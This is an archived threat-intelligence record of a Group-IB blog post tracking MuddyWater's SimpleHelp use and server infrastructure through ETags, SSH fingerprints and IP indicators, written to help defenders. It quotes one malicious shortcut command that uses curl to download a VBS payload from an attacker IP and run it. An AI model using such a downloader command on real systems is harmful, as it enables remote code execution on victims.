{ "id": "bd534e82-ef4e-43b7-9588-42516f0f9946", "created_at": "2026-04-06T00:18:14.474769Z", "updated_at": "2026-04-10T13:12:50.763741Z", "deleted_at": null, "sha1_hash": "ba530fe00299e206d2d60acc854d6e28aa03aae6", "title": "SimpleHarm tool: Tracking MuddyWater’s infrastructure | Group-IB Blog", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 154995, "plain_text": "Nikita Rostovcev\r\nAPAC Technical Head - ASM, TI \u0026 DRP\r\nSimpleHarm: Tracking\r\nMuddyWater’s infrastructure\r\nGroup-IB analysts discovered the new MuddyWater infrastructure while researching the pro-state\r\ngroup’s use of the legitimate SimpleHelp tool.\r\nApril 18, 2023 · min to read · Threat Intelligence\r\n← Blog\r\nhttps://www.group-ib.com/blog/muddywater-infrastructure/\r\nPage 1 of 29\n\nAPT MuddyWater Threat Intelligence\r\nAs a result of the ongoing military conflict, state-sponsored hackers have been more active, as we\r\nforecasted in the report Hi-Tech Crime Trends 2022/2023. Most attackers have engaged in cyber\r\nespionage against neighboring countries. One such group is MuddyWater, which Group-IB has\r\nwritten about before.\r\nAccording to publicly available research, MuddyWater is assessed to be a subordinate element\r\nwithin Iran’s Intelligence Ministry (MOIS). According to the US Congressional Research Service, the\r\nMOIS “conducts domestic surveillance to identify regime opponents”. Recent MuddyWater attacks\r\ntargeted insurance, manufacturing and telecommunications companies in Israel and Egypt. As part\r\nof the attacks against Israeli organizations, the group exploited Log4j 2 vulnerabilities, according to\r\nMicrosoft.\r\nIn the last few years, the group has been using legitimate remote control tools such as\r\nScreenConnect, RemoteUtilities, and Syncro. By doing so, MuddyWater can connect to user\r\ndevices at any moment and execute arbitrary commands, as well as download and upload files. It is\r\ndifficult to track the activity of these tools because they are legitimate and not compromised, which\r\nis why they cannot be detected using traditional security tools. In the fall of 2022, using the Group-IB Threat Intelligence system, we discovered that MuddyWater used another similar tool,\r\nSimpleHelp. As we were conducting our analysis, our colleagues at ESET published a quarterly\r\nreport in which they also mentioned that the group was using this tool.\r\nIn this blog post, we describe how the group uses SimpleHelp as well as previously unknown\r\ninfrastructure, which we uncovered through our research. By continuously tracking tactics,\r\ntechniques, and procedures used by threat actors, Group-IB is able to proactively respond to\r\nhttps://www.group-ib.com/blog/muddywater-infrastructure/\r\nPage 2 of 29\n\nmalicious campaigns in the making and block new servers even when they are only being set up for\r\nattacks.\r\nThe aim of this blog post is to help information security specialists investigate incidents, understand\r\nMuddyWater’s network infrastructure in detail, and identify the group’s servers independently. This\r\nwill help fine-tune security systems to proactively detect new activity by this threat actor.\r\nMuddyWater Profile\r\nPresumed origin: Iran.\r\nFirst active: 2017.\r\nTop five targeted industries: military, telecommunications, manufacturing, education, oil and gas.\r\nTop ten targeted countries: Turkey, Pakistan, UAE, Iraq, Israel, Saudi Arabia, Jordan, USA,\r\nAzerbaijan, Afghanistan.\r\nOther names: TEMP.Zagros, Seedworm, Static Kitten, SectorD02, TA450, Boggy Serpens,\r\nMERCURY.\r\nKey findings\r\nMuddyWater uses SimpleHelp, a legitimate remote device control and management tool, to\r\nensure persistence on victim devices.\r\nSimpleHelp is not compromised and is used as intended. The threat actors found a way to\r\ndownload the tool from the official website and use it in their attacks.\r\nAccording to our data, MuddyWater used SimpleHelp for the first time on June 30, 2022. At the\r\ntime of writing, the group has at least eight servers on which they have SimpleHelp installed.\r\nThis blog post describes MuddyWater’s previously unknown infrastructure and points to links\r\nwith some of the group’s publicly known IP addresses.\r\nThe group’s servers can be tracked by the same ETag hashes used:\r\n2aa6-5c939a3a79153\r\n2aa6-5b27e6e58988b\r\nhttps://www.group-ib.com/blog/muddywater-infrastructure/\r\nPage 3 of 29\n\nSimpleHelp\r\nIn the fall of 2022, as part of a retrospective analysis of infrastructures used by threat actors, Group-IB’s Threat Intelligence platform detected the IP address 51.254.25[.]36, which has been connected\r\nwith APT MuddyWater since at least February 2022. We later detected a file linked to this IP\r\naddress; the file is called new aviation communications.exe (SHA1:\r\n53ce7a2850e27465f3aae3cc2fae1a3ec1b6a640).\r\nFigure 1: Graph analysis of infrastructure connected with 51.254.25[.]36. Source: Group-IB Threat\r\nIntelligence\r\n2aa6-5c939a773f7a2\r\nhttps://www.group-ib.com/blog/muddywater-infrastructure/\r\nPage 4 of 29\n\nThe file “new aviation communications.exe” was uploaded to VirusTotal on June 30, 2022. It is a\r\nlegitimate version of SimpleHelp with a valid digital signature. The file was compiled on June 18,\r\n2021 at 13:45:41 UTC.\r\nFigure 2: Dates when the file with the SHA1\r\n53ce7a2850e27465f3aae3cc2fae1a3ec1b6a640 was compiled and uploaded to VirusTotal\r\nhttps://www.group-ib.com/blog/muddywater-infrastructure/\r\nPage 5 of 29\n\nhttps://www.group-ib.com/blog/muddywater-infrastructure/\r\nPage 6 of 29\n\nFigure 3: Digital signatures of the file with the SHA1 53ce7a2850e27465f3aae3cc2fae1a3ec1b6a640\r\nAfter the analysis of two IP addresses, which Group-IB Threat Intelligence attributes to MuddyWater,\r\nwe also discovered deployed SimpleHelp servers: 51[.]255[.]19[.]179 and 51[.]255[.]19[.]178\r\nSimpleHelp admin panel\r\nSimpleHelp by SimpleHelp Ltd (UK) is an administration panel for system administrators and tech\r\nsupport teams. It looks like this:\r\nFigure 4: SimpleHelp servers 51[.]255[.]19[.]179 and 51[.]255[.]19[.]178\r\nhttps://www.group-ib.com/blog/muddywater-infrastructure/\r\nPage 7 of 29\n\nFigure 5: SImpleHelp interface\r\nThe SimpleHelp client installed on victim devices can constantly run as a system service, which\r\nmakes it possible to gain access to the user’s device at any point in time, even after a reboot.\r\nFigure 6: Remote access to a victim’s computer in SimpleHelp\r\nIn addition to connecting remotely, SimpleHelp operators can execute various commands on the\r\nvictim’s device, including those that require administrator privileges:\r\nSimpleHelp operators can also use the command “Connect in Terminal Mode” to take control of the\r\ntarget device covertly.\r\nFigure 7: Remote command execution in SimpleHelp\r\nhttps://www.group-ib.com/blog/muddywater-infrastructure/\r\nPage 8 of 29\n\nFigure 8: The command “Connect in Terminal Mode”\r\nIn this case, the shell is opened with system privileges:\r\nIn other words, the standard SimpleHelp functionality gives threat actors virtually unlimited\r\npossibilities to conduct attacks.\r\nWhat happens after SimpleHelp is installed?\r\nAt the time of writing, we do not know how exactly MuddyWater distributes the samples and what\r\nactions the group takes after gaining access through SimpleHelp. We can assume that the group\r\nsends out phishing emails containing links to file storage systems such as Onedrive or Onehub to\r\nhttps://www.group-ib.com/blog/muddywater-infrastructure/\r\nPage 9 of 29\n\ndownload SimpleHelp installers. The group can also establish persistence on victim devices by using\r\nFast Reverse Proxy (FRP) or Ligolo in order to extract information of interest and determine ways to\r\nmove across the network.\r\nMuddyWater’s network infrastructure\r\nGroup-IB devotes considerable time to tracking the network infrastructure used by state-sponsored\r\nand other threat groups. As a result we are able to proactively protect our customers and collect\r\ndata about attacks that are either ongoing or in the making, even when we do not have access to\r\nmalicious samples. The infrastructure that MuddyWater currently uses can be divided into two\r\ncategories:\r\nMuddyWater has been found to use its own unique set of components for deploying web servers\r\non purchased virtual private servers (VPSs). We detected the following ETag hashes used by the\r\ngroup:\r\nMuddyWater is known to have used some of the servers connected with these ETag hashes. Other\r\nservers have links to various malicious files or software used for attacks, including legitimate\r\nSimpleHelp installers.\r\nLet’s do a graph analysis\r\nLet’s start with the group’s publicly known IP addresses to illustrate the connection with the\r\nassistance of Group-IB’s proprietary Graph Network Analysis Tool. According to a Microsoft report,\r\nMuddyWater used the following IP addresses, where the abovementioned ETags were found:\r\nPublicly known IP addresses used by the group\r\nNon-disclosed IP addresses that are highly likely used by the group, according to Group-IB’s\r\nassessments\r\n2aa6-5c939a3a79153\r\n2aa6-5b27e6e58988b\r\n2aa6-5c939a773f7a2\r\n164[.]132[.]237[.]64\r\n91[.]121[.]240[.]104\r\nhttps://www.group-ib.com/blog/muddywater-infrastructure/\r\nPage 10 of 29\n\nFigure 9: MuddyWater infrastructure as illustrated by the Group-IB Graph Network Analysis Tool.\r\nSource: Group-IB Threat Intelligence\r\n164[.]132[.]237[.]64\r\nThis host has multiple ETag hashes:\r\nhttps://www.group-ib.com/blog/muddywater-infrastructure/\r\nPage 11 of 29\n\nFigure 10: Analysis of the host 164[.]132[.]237[.]64 and linked ETag hashes, illustrated by the Group-IB Graph Network Analysis tool. Source: Group-IB Threat Intelligence\r\nAnalysis of the infrastructure revealed a cross-over between the hosts 164[.]132[.]237[.]64 and\r\n164[.]132[.]237[.]65 through the use of the same SSH fingerprint\r\ne7383c77c6f804cffac6c88651b7bce2.\r\nhttps://www.group-ib.com/blog/muddywater-infrastructure/\r\nPage 12 of 29\n\nFigure 11: Additional example of MuddyWater infrastructure illustrated by the Group-IB Graph\r\nNetwork Analysis tool. Source: Group-IB Threat Intelligence\r\nOn the server 164[.]132[.]237[.]65, we found the framework Cobalt Strike with the following\r\nconfiguration file:\r\nFigure 12: Cobalt Strike configuration file\r\nIn November 2022, Group-IB’s Digital Forensics Lab and Threat Intelligence team responded to an\r\nincident in a network belonging to an organization in the Middle East. The operation revealed that\r\nthe abovementioned IP address (164[.]132[.]237[.]65) had been used in the attack, while the tactics,\r\ntechniques, and procedures (TTPs) we discovered fully matched those used by MuddyWater. What\r\nhttps://www.group-ib.com/blog/muddywater-infrastructure/\r\nPage 13 of 29\n\nis interesting about this config is that it has a unique value in the field http-post.client and has no\r\nwatermark field. This suggests that the threat actors use custom samples of the well-known tool\r\nCobalt Strike, which can be tracked.\r\n91[.]121[.]240[.]104\r\nThis IP address is also mentioned in the Microsoft report and has the ETag 2aa6-5c939a3a79153:\r\nFigure 13: Analysis of the IP address 91[.]121[.]240[.]104, illustrated by the Group-IB Graph Network\r\nAnalysis tool. Source: Group-IB Threat Intelligence\r\nhttps://www.group-ib.com/blog/muddywater-infrastructure/\r\nPage 14 of 29\n\nSuspicious ETag hashes: MuddyWater’s\r\npreviously unknown infrastructure\r\nThis part of the blog describes MuddyWater’s previously unknown infrastructure as well as some\r\npublicly known IP addresses used by the attackers.\r\nETag 2aa6-5c939a3a79153\r\nThe figure below shows that the three aforementioned IP addresses are linked through the HTTP\r\nETag 2aa6-5c939a3a79153. Group-IB Threat Intelligence shows more than 50 servers linked to\r\nthis ETag. The full list can be found in the network indicators table at the end of this blog post. This\r\nsection lists what we deem the most noteworthy IP addresses connected with the ETag 2aa6-\r\n5c939a3a79153.\r\nhttps://www.group-ib.com/blog/muddywater-infrastructure/\r\nPage 15 of 29\n\nFigure 14: Analysis of MuddyWater’s previously unknown infrastructure, illustrated by the Group-IB\r\nGraph Network Analysis tool. Source: Group-IB Threat Intelligence\r\n137[.]74[.]131[.]24\r\nDuring an incident response operation, Group-IB researchers found the above IP address in the\r\nnetwork used by a Middle Eastern organization. Analysis of the victim’s infrastructure revealed the\r\nfollowing traces of MuddyWater:\r\nhttps://www.group-ib.com/blog/muddywater-infrastructure/\r\nPage 16 of 29\n\nFigure 15: Analysis of the host 137[.]74[.]131[.]24 and related ETags, illustrated by the Group-IB Graph\r\nNetwork Analysis tool. Source: Group-IB Threat Intelligence.\r\n91[.]121[.]240[.]96\r\nThe ETag 2aa6-5c939a3a79153 was located at the IP address 91[.]121[.]240[.]96 between October\r\n25, 2021 and September 23, 2022.\r\nThis address is connected with a PowerShell script that was uploaded to VirusTotal via the web\r\ninterface from Kazakhstan on July 19, 2022, i.e. when the ETag was on the server.\r\nhttps://www.group-ib.com/blog/muddywater-infrastructure/\r\nPage 17 of 29\n\nFigure 16: PowerShell script uploaded to VirusTotal on July 19, 2022\r\nThis code is written in PowerShell. It is designed to receive remote commands from a remote server,\r\nexecute them on the victim device, and send the results back to the server.\r\nhttps://www.group-ib.com/blog/muddywater-infrastructure/\r\nPage 18 of 29\n\nFigure 17: Network communication of the PowerShell script with the command-and-control (C\u0026C)\r\nserver 91[.]121[.]240[.]96\r\n91[.]121[.]240[.]108\r\nThe above is another IP address connected with the ETag 2aa6-5c939a3a79153. A shortcut file was\r\nfound on VirusTotal, where it was uploaded on October 11, 2022.\r\nFigure 18: Metadata relating to the file with the SHA256\r\n2528838a609aa143769efb37dff45af723868d4ed33eb1ce0e2d6ce64b2a1507\r\nThis file was distributed through an archive called request-for-service-no10102022.zip\r\nThe archive was uploaded to VirusTotal from Lithuania and Switzerland:\r\nFigure 19: Dates when the archive request-for-service-no10102022.zip was uploaded to VirusTotal\r\nShell command in the shortcut:\r\nhttps://www.group-ib.com/blog/muddywater-infrastructure/\r\nPage 19 of 29\n\n/c curl -s http://91[.]121[.]240[.]108:443/HBIy \u003e C:\\programdata\\temp.vbs \u0026\u0026 START microso\r\nThe command was used to download a payload from http://91[.]121[.]240[.]108:443/HBIy and save\r\nit to the file C:\\programdata\\temp.vbs while the shortcut was executed. As a distraction, the page\r\nhxxps://mohap[.]gov[.]ae is opened in Microsoft Edge with a dialog box informing that the file is\r\ncorrupted. Unfortunately, at the time of the analysis the file HBIy was unavailable, which is why its\r\ncontents could not be examined.\r\nIt is worth noting the username that was left when the shortcut was created: C:\\Users\\Pink\r\nPanter\\Documents\\PDF.ico. This suggests that the user who created the file has the username\r\nPink Panter.\r\n178[.]32[.]30[.]3\r\nThe above IP address has already been used by MuddyWater in its attacks against Turkey and a\r\nnumber of countries in Asia. The attacks were described by Cisco Talos researchers. The address\r\nalso has the ETag 2aa6-5c939a3a79153:\r\nhttps://www.group-ib.com/blog/muddywater-infrastructure/\r\nPage 20 of 29\n\nFigure 20: Connections to the IP address 178[.]32[.]30[.]3, illustrated by the Group-IB Graph Network\r\nAnalysis tool. Source: Group-IB Threat Intelligence\r\n149[.]202[.]242[.]80\r\nThe IP address 149[.]202[.]242[.]80 is also connected with another ETag 2aa6-5b27e6e58988b.\r\nMore information about it can be found below:\r\nhttps://www.group-ib.com/blog/muddywater-infrastructure/\r\nPage 21 of 29\n\nFigure 21: Connections to the IP address 149[.]202[.]242[.]80, illustrated by the Group-IB Graph\r\nNetwork Analysis tool. Source: Group-IB Threat Intelligence\r\nETag 2aa6-5b27e6e58988b\r\nThe IP address 149[.]202[.]242[.]80 has multiple ETags. One of them is 2aa6-5b27e6e58988b.\r\nFive web servers are connected with this ETag. One of them is 164[.]132[.]237[.]66, which is part of\r\nthe subnet 164[.]132[.]237[.]0/24 mentioned above.\r\nhttps://www.group-ib.com/blog/muddywater-infrastructure/\r\nPage 22 of 29\n\nFigure 22: ETag 2aa6-5b27e6e58988b and related IP addresses, illustrated by the Group-IB Graph\r\nNetwork Analysis tool. Source: Group-IB Threat Intelligence.\r\nThis address is also linked to the ETag 2aa6-5c939a773f7a2, which we describe below.\r\nSSH fingerprint 3648a6085512ab91f5a23bafb8418f7b\r\nThis SSH fingerprint is linked to six IP addresses:\r\nThe SSH fingerprint is connected with the IP address 164[.]132[.]237[.]64 used by the group, which\r\nhas already been mentioned above.\r\n51[.]255[.]19[.]183\r\n149[.]202[.]242[.]85\r\n149[.]202[.]242[.]80\r\n164[.]132[.]237[.]64\r\n164[.]132[.]237[.]66\r\n149[.]202[.]242[.]86\r\nhttps://www.group-ib.com/blog/muddywater-infrastructure/\r\nPage 23 of 29\n\nFigure 23: Links to the SSH fingerprint as illustrated by the Group-IB Graph Network Analysis tool.\r\nSource: Group-IB Threat Intelligence.\r\nThe hosts 164[.]132[.]237[.]66 and 149[.]202[.]242[.]85, which are linked to the SSH fingerprint, share\r\nthe abovementioned ETag 2aa6-5c939a773f7a2. Some of the ETag’s addresses also overlap with\r\n2aa6-5c939a3a79153.\r\nETag 2aa6-5c939a773f7a2\r\n137[.]74[.]131[.]16 and 149[.]202[.]242[.]84\r\nMuddyWater has used these two addresses in the past, as described by Cisco Talos.\r\nhttps://www.group-ib.com/blog/muddywater-infrastructure/\r\nPage 24 of 29\n\nFigure 24:. Links to the ETag 2aa6-5c939a773f7a2 as illustrated by the Group-IB Graph Network\r\nAnalysis tool.\r\nThis blog only mentions IP addresses that have linked files or a noteworthy history. Other IP\r\naddresses connected with specific ETags are listed in the table at the end of this article.\r\nConclusion\r\nWe believe it is important to share relevant hunting techniques and we encourage cybersecurity\r\nresearchers to publish their latest findings more often. Information security specialists can use the\r\nETag hashes mentioned in this article and search for malicious servers using search engines such as\r\nCensys or Shodan. The table with network indicators lists the IP addresses of some servers where\r\nSimpleHelp is installed and which, according to Group-IB Threat Intelligence, belong to\r\nMuddyWater.\r\nhttps://www.group-ib.com/blog/muddywater-infrastructure/\r\nPage 25 of 29\n\nAt the moment, we do not know for sure what vector MuddyWater uses for distributing SimpleHelp\r\ninstallers. It is likely, however, that the threat actors use phishing emails with links to cloud storage\r\nspaces such as OneDrive, Onehub, and Dropbox.\r\nRecommendations\r\nStrengthen your security posture with\r\nGroup-IB Threat Intelligence\r\nUse unique threat intelligence data to prevent attacks\r\nUse network indicators provided in this blog post to track MuddyWater’s activity and\r\nproactively protect against the group’s attacks. By using search engines such as Shodan, you\r\ncan search for malicious servers used by the threat actors and always be ready to proactively\r\nblock such hosts. In addition, Shodan can be used to search for any new infrastructure used by\r\nthe group.\r\n1.\r\nUse corporate email security tools to effectively prevent various threat groups from using\r\ncorporate email as an attack vector. Thanks to unique threat intelligence data and patented\r\ntechnologies, Group-IB’s solution called Business Email Protection detects and blocks\r\nphishing, malicious attachments, and other BEC attacks with unprecedented precision, even if\r\nthe threat actors use detection evasion techniques. Group-IB Business Email Protection also\r\nanalyzes and attributes email-borne threats to proactively protect against such attacks and\r\nstrengthen the organization’s overall security posture.\r\n2.\r\nFor advanced cybersecurity teams, we recommend using Group-IB’s Threat Intelligence\r\nsystem, which, as we showed in this blog post, helped us detect MuddyWater’s use of\r\nSimpleHelp and expose its previously unknown infrastructure. Thanks to unique data sources,\r\nour Threat Intelligence system can be used to detect phishing and other relevant threats as\r\nearly as during their preparation stage. The built-in graph analysis tool enriched by data from the\r\nlargest threat-actor database reveals links between attackers, their infrastructures, and their\r\ntools. Enriching cybersecurity with threat intelligence helps significantly strengthen an\r\norganization’s ability to counter attacks, including ones carried out by state-sponsored groups.\r\n3.\r\nhttps://www.group-ib.com/blog/muddywater-infrastructure/\r\nPage 26 of 29\n\nNetwork indicators\r\nHosts by ETag\r\n2aa6-\r\n5c939a3a79153\r\nHosts by ETag\r\n2aa6-\r\n5b27e6e58988b\r\nPublicly confirmed\r\nMuddyWater\r\nIPs\r\nHosts by ETag\r\n2aa6-\r\n5c939a773f7a2\r\nMuddyWater\r\nSimpleHelp\r\nservers\r\n137.74.131.19 149.202.242.80 141.95.177.133 141.95.177.129\r\n137.74.131.20 149.202.242.86 141.95.177.132 141.95.177.142\r\n137.74.131.22 164.132.237.64 164.132.237.64 164.132.237.64 164.132.237.78\r\n137.74.131.24 164.132.237.66 141.95.177.134 178.32.30.3\r\n137.74.131.30 51.255.19.183 91.121.240.105 51.254.25.36\r\n141.95.177.129 91.121.240.101 51.255.19.178\r\n141.95.177.130 141.95.177.131 51.255.19.179\r\n141.95.177.131 91.121.240.100 91.121.240.110\r\nShare this article\r\nFound it interesting? Don't hesitate to share it to wow your friends or colleagues\r\nRequest a demo\r\nhttps://www.group-ib.com/blog/muddywater-infrastructure/\r\nPage 27 of 29\n\nResources\r\nResearch Hub\r\nSuccess Stories\r\nKnowledge Hub\r\nCertificates\r\nWebinars\r\nPodcasts\r\nTOP Investigations\r\nRansomware Notes\r\nAI Cybersecurity Hub\r\nProducts\r\nThreat Intelligence\r\nFraud Protection\r\nManaged XDR\r\nAttack Surface Management\r\nDigital Risk Protection\r\nBusiness Email Protection\r\nCyber Fraud Intelligence\r\nPlatform\r\nUnified Risk Platform\r\nIntegrations\r\nPartners\r\nPartner Program\r\nMSSP and MDR Partner\r\nProgram\r\nTechnology Partners\r\nPartner Locator\r\nCompany\r\nAbout Group-IB\r\nTeam\r\nCERT-GIB\r\nCareers\r\nInternship\r\nAcademic Aliance\r\nSustainability\r\nMedia Center\r\nContact\r\nhttps://www.group-ib.com/blog/muddywater-infrastructure/\r\nPage 28 of 29\n\nAPAC: +65 3159 3798\r\nEU \u0026 NA: +31 20 226 90 90\r\nMEA: +971 4 568 1785\r\ninfo@group-ib.com\r\n© 2003 – 2026 Group-IB is a global leader in the fight against cybercrime, protecting customers\r\naround the world by preventing breaches, eliminating fraud and protecting brands.\r\nTerms of Use Cookie Policy Privacy Policy\r\nSubscription plans Services Resource Center\r\nSubscribe to stay up to date with the\r\nlatest cyber threat trends\r\nContact\r\nhttps://www.group-ib.com/blog/muddywater-infrastructure/\r\nPage 29 of 29", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE", "ETDA" ], "origins": [ "web" ], "references": [ "https://www.group-ib.com/blog/muddywater-infrastructure/" ], "report_names": [ "muddywater-infrastructure" ], "threat_actors": [ { "id": "02e1c2df-8abd-49b1-91d1-61bc733cf96b", "created_at": "2022-10-25T15:50:23.308924Z", "updated_at": "2026-04-10T02:00:05.298591Z", "deleted_at": null, "main_name": "MuddyWater", "aliases": [ "MuddyWater", "Earth Vetala", "Static Kitten", "Seedworm", "TEMP.Zagros", "Mango Sandstorm", "TA450" ], "source_name": "MITRE:MuddyWater", "tools": [ "STARWHALE", "POWERSTATS", "Out1", "PowerSploit", "Small Sieve", "Mori", "Mimikatz", "LaZagne", "PowGoop", "CrackMapExec", "ConnectWise", "SHARPSTATS", "RemoteUtilities", "Koadic" ], "source_id": "MITRE", "reports": null }, { "id": "2ed8d590-defa-4873-b2de-b75c9b30931e", "created_at": "2023-01-06T13:46:38.730137Z", "updated_at": "2026-04-10T02:00:03.08136Z", "deleted_at": null, "main_name": "MuddyWater", "aliases": [ "TEMP.Zagros", "Seedworm", "COBALT ULSTER", "G0069", "ATK51", "Mango Sandstorm", "TA450", "Static Kitten", "Boggy Serpens", "Earth Vetala" ], "source_name": "MISPGALAXY:MuddyWater", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "156b3bc5-14b7-48e1-b19d-23aa17492621", "created_at": "2025-08-07T02:03:24.793494Z", "updated_at": "2026-04-10T02:00:03.634641Z", "deleted_at": null, "main_name": "COBALT ULSTER", "aliases": [ "Boggy Serpens ", "ENT-11 ", "Earth Vetala ", "ITG17 ", "MERCURY ", "Mango Sandstorm ", "MuddyWater ", "STAC 1171 ", "Seedworm ", "Static Kitten ", "TA450 ", "TEMP.Zagros ", "UNC3313 ", "Yellow Nix " ], "source_name": "Secureworks:COBALT ULSTER", "tools": [ "CrackMapExec", "Empire", "FORELORD", "Koadic", "LaZagne", "Metasploit", "Mimikatz", "Plink", "PowerStats" ], "source_id": "Secureworks", "reports": null }, { "id": "3c430d71-ab2b-4588-820a-42dd6cfc39fb", "created_at": "2022-10-25T16:07:23.880522Z", "updated_at": "2026-04-10T02:00:04.775749Z", "deleted_at": null, "main_name": "MuddyWater", "aliases": [ "ATK 51", "Boggy Serpens", "Cobalt Ulster", "G0069", "ITG17", "Mango Sandstorm", "MuddyWater", "Operation BlackWater", "Operation Earth Vetala", "Operation Quicksand", "Seedworm", "Static Kitten", "T-APT-14", "TA450", "TEMP.Zagros", "Yellow Nix" ], "source_name": "ETDA:MuddyWater", "tools": [ "Agentemis", "BugSleep", "CLOUDSTATS", "ChromeCookiesView", "Cobalt Strike", "CobaltStrike", "CrackMapExec", "DCHSpy", "DELPHSTATS", "EmPyre", "EmpireProject", "FruityC2", "Koadic", "LOLBAS", "LOLBins", "LaZagne", "Living off the Land", "MZCookiesView", "Meterpreter", "Mimikatz", "MuddyC2Go", "MuddyRot", "Mudwater", "POWERSTATS", "PRB-Backdoor", "PhonyC2", "PowGoop", "PowerShell Empire", "PowerSploit", "Powermud", "QUADAGENT", "SHARPSTATS", "SSF", "Secure Socket Funneling", "Shootback", "Smbmap", "Valyria", "chrome-passwords", "cobeacon", "prb_backdoor" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434694, "ts_updated_at": 1775826770, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/ba530fe00299e206d2d60acc854d6e28aa03aae6.pdf", "text": "https://archive.orkl.eu/ba530fe00299e206d2d60acc854d6e28aa03aae6.txt", "img": "https://archive.orkl.eu/ba530fe00299e206d2d60acc854d6e28aa03aae6.jpg" } }